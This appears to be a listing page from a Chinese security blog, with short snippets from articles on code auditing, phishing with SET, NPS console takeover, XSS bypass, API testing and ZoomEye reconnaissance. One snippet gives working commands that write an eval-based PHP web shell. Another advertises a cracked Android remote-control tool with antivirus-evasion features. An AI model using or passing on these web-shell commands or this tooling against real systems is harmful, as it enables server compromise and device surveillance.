代码审计-TP5 框架及无框架变量覆盖反序列化
漏洞关键字 SQL 注入:select insert update mysql_query mysqli 等 文件上传:$_FILES,type=”file”,上传,move_uploaded_file() 等 XSS 跨站:print print_r echo sprintf die var_dump va...
社会工程 — 使用社会工程工具包 (SET) 进行网络钓鱼
免责声明!!! 本演示使用社会工程工具包 (SET) 工具仅用于教育目的。目的是提高人们对恶意行为者实施网络钓鱼攻击所采用技术的认识,并教育参与者如何识别和减轻此类威胁。 请参与者注意,未...
红队技术 – 接管 NPS 控制台
红队反制 - 接管 NPS 控制台 最近看到有意思的东西,参考千寻瀑的文章复现了一下 https://github.com/ehang-io/nps/releases/tag/v0.26.10 到 github 上下载相应的版本,我这里用的 win 就下载 ...
EagleSpy V4 破解版 (安卓控)
支持英语、中文和俄语~在运行时切换语言 Apk 构建器和定制、隐藏 Apk、快速构建 Apk 自动 Apk 加密器以绕过防病毒 工具 - 反编译 Apk、编译 Apk、保护 Apk、签名 Apk 等。 自定义 Apk Dropper ...
steam 某站的XSS漏洞长度绕过限制实现攻击
所有加密文章都是博主原创或精心收集或自行翻译国外的等较高质量的文章,每篇文章都会含有一些较为不错的知识点。但是请注意,加密文章如果你想查看,那么需要你用比较有质量的文章来和博主做交...
API 接口测试
一、API 接口介绍 1.1 RPC(远程过程调用) 远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程...
记php命令执行写shell
php代码执行&命令执行 getshell echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php bypass 绕过...
如何利用钟馗之眼(zoomeye)手动获取酒店节目源
前面有用到fofa的空间测绘获取酒店源和组播源,今天试试钟馗之眼来获取酒店源: 利用工具网络测绘:钟馗之眼(https://www.zoomeye.org/) 一、酒店源获取 首先需要找到有效的酒店源IP,其次在...
